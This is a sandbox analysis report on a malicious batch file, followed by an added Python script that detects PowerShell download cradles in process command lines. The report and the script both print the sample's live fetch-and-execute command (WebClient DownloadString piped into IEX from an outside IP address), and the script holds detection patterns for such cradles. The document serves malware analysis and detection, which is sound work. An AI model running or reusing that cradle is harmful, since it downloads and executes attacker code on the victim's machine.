Analysis
max time kernel: 115s
max time network: 152s
platform: windows10_x64
resource: win10v191014
submitted: 11-02-2020 20:10

Static task: static1

Behavioral task: behavioral1
Sample: eEqGBFWD.bat
Resource: win7v191014 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: eEqGBFWD.bat
Resource: win10v191014 (windows10_x64)
0 signatures, 0 seconds
General
Target: eEqGBFWD.bat
Size: 194B
MD5: 5921814fde0e9a996f0dee5a45a865c9
SHA1: 946b9d4f1081b053f9b90544dcc83367e7cfbc21
SHA256: bf894d6ef5402e0c90fd5cfc08bd271dc601d90abdf0f73bc8c17e5a2861918b
SHA512: 5f953ff30984392246fde646a900d5d91eb93f64345da39fc91007c67e913ce5b7ea8f59a5e572de72fa1052877a1eb7082fc67a31f9f4f118dd40db88e33763
Score: 10/10
Malware Config
Extracted
Language: ps1
Source:
URLs:
  ps1.dropper  http://185.103.242.78/pastes/eEqGBFWD
Signatures

Program crash (1 IoC)
Processes:
  pid   process
  2000  WerFault.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  2000  WerFault.exe
  Token: SeBackupPrivilege   2000  WerFault.exe
  Token: SeDebugPrivilege    2000  WerFault.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes:
  pid   process
  2000  WerFault.exe (18 identical occurrences)
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments. In this run, however, every read below is made by WerFault.exe (PID 2000), the Windows Error Reporting handler that was launched for the crashed PowerShell process (PID 5060, see the Processes tree) and that collects hardware details for its crash report. The reads therefore describe the crash handler, not sandbox evasion by the sample itself; the sample's own behaviour is limited to the download cradle in the powershell.exe command line.
Processes:
  description        ioc                                                                                process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                    WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz               WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe
Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
  description        ioc                                                           process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS             WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU   WerFault.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\eEqGBFWD.bat"
  PID: 5004

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/eEqGBFWD');Invoke-LZNYLIOOLOW;Start-Sleep -s 10000"
    PID: 5060

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 704
      PID: 2000
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Checks processor information in registry; Enumerates system info in registry

\??\c:\windows\system32\taskhostw.exe
  Command line: taskhostw.exe -RegisterDevice -SettingChange -Full
  PID: 4732
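The chain above (cmd.exe running the batch file, which starts 32-bit PowerShell with a WebClient download-and-IEX cradle, which is then picked up by WerFault.exe) is the pattern a detection rule should key on rather than the registry reads attributed to the crash handler. The following Python script is an added example, not part of this report or of any sandbox's own code. It takes the process entries exactly as listed in the Processes section (PIDs, parents and command lines), flags PowerShell processes that both fetch remote content and hand it to Invoke-Expression, extracts the URL as an IoC, and notes when a WerFault.exe entry names a flagged PID with -p, which means the fetched script may not have run to completion. The rule names, the fetch-plus-execute verdict logic and the extra benign and fetch-only entries are the example's own choices.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Process entries as listed in the report's Processes section: (pid, parent pid, command line).
# taskhostw.exe has no parent shown there; it is kept as a benign entry that must not be flagged.
REPORTED_PROCESSES: List[Tuple[int, Optional[int], str]] = [
    (5004, None, r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\eEqGBFWD.bat"'),
    (5060, 5004, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
                 "\"IEX (New-Object System.Net.WebClient).DownloadString("
                 "'http://185.103.242.78/pastes/eEqGBFWD');Invoke-LZNYLIOOLOW;Start-Sleep -s 10000\""),
    (2000, 5060, r"C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 704"),
    (4732, None, r"taskhostw.exe -RegisterDevice -SettingChange -Full"),
]

# (rule name, pattern). Rule names are this example's own; PowerShell is case-insensitive, so are the patterns.
CRADLE_RULES = [
    ("net.webclient download", re.compile(r"WebClient\)?\s*\.Download(String|File|Data)", re.I)),
    ("invoke-expression", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)),
    ("web request cmdlet", re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)),
    ("encoded command", re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("long sleep after execution", re.compile(r"Start-Sleep\s+-s(?:econds)?\s+\d{4,}", re.I)),
]
FETCH_RULES = {"net.webclient download", "web request cmdlet"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
WERFAULT_RE = re.compile(r"WerFault\.exe\b.*?\s-p\s+(\d+)", re.I)  # -p <pid> names the crashed process


@dataclass
class Finding:
    pid: int
    parent_image: Optional[str]
    reasons: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    crashed: bool = False  # a WerFault.exe entry names this pid with -p

    @property
    def is_cradle(self) -> bool:
        # A cradle both fetches remote content and hands it to Invoke-Expression;
        # a lone Invoke-WebRequest or a lone IEX is only "suspicious".
        hits = set(self.reasons)
        return bool(hits & FETCH_RULES) and "invoke-expression" in hits


def image_name(cmdline: str) -> str:
    """Executable name from the first token (paths containing spaces are not handled)."""
    return cmdline.split(" ", 1)[0].rsplit("\\", 1)[-1].lower()


def crash_victims(processes) -> Set[int]:
    """PIDs handed to WerFault.exe with -p, i.e. processes that crashed."""
    victims = set()
    for _pid, _ppid, cmd in processes:
        m = WERFAULT_RE.search(cmd)
        if m:
            victims.add(int(m.group(1)))
    return victims


def analyze(processes) -> List[Finding]:
    """Return one Finding per PowerShell process that trips at least one rule."""
    by_pid = {pid: cmd for pid, _, cmd in processes}
    victims = crash_victims(processes)
    findings = []
    for pid, ppid, cmd in processes:
        if image_name(cmd) not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = image_name(by_pid[ppid]) if ppid in by_pid else None
        f = Finding(pid=pid, parent_image=parent)
        f.reasons = [name for name, rx in CRADLE_RULES if rx.search(cmd)]
        if "\\syswow64\\" in cmd.lower():
            f.reasons.append("32-bit powershell on a 64-bit host")
        if parent in ("cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"):
            f.reasons.append(f"spawned by {parent}")
        f.urls = URL_RE.findall(cmd)
        f.crashed = pid in victims
        if f.reasons:
            findings.append(f)
    return findings


def report(findings: List[Finding]) -> List[str]:
    """Human-readable lines: verdict, reasons, URL IoCs and a crash note where it applies."""
    lines = []
    for f in findings:
        verdict = "download cradle" if f.is_cradle else "suspicious powershell"
        lines.append(f"pid {f.pid}: {verdict} ({'; '.join(f.reasons)})")
        lines.extend(f"  ioc url: {u}" for u in f.urls)
        if f.crashed:
            lines.append("  note: WerFault.exe was launched for this pid; the fetched script may not have run to completion")
    return lines


if __name__ == "__main__":
    print("\n".join(report(analyze(REPORTED_PROCESSES))))
```

Run as-is it reports PID 5060 as a download cradle with the pastes URL as the IoC and the WerFault note; cmd.exe, WerFault.exe and taskhostw.exe produce no finding. The fetch-plus-execute requirement is deliberate: on a real host a lone Invoke-WebRequest is routine administration, while WebClient.DownloadString piped into IEX almost never is.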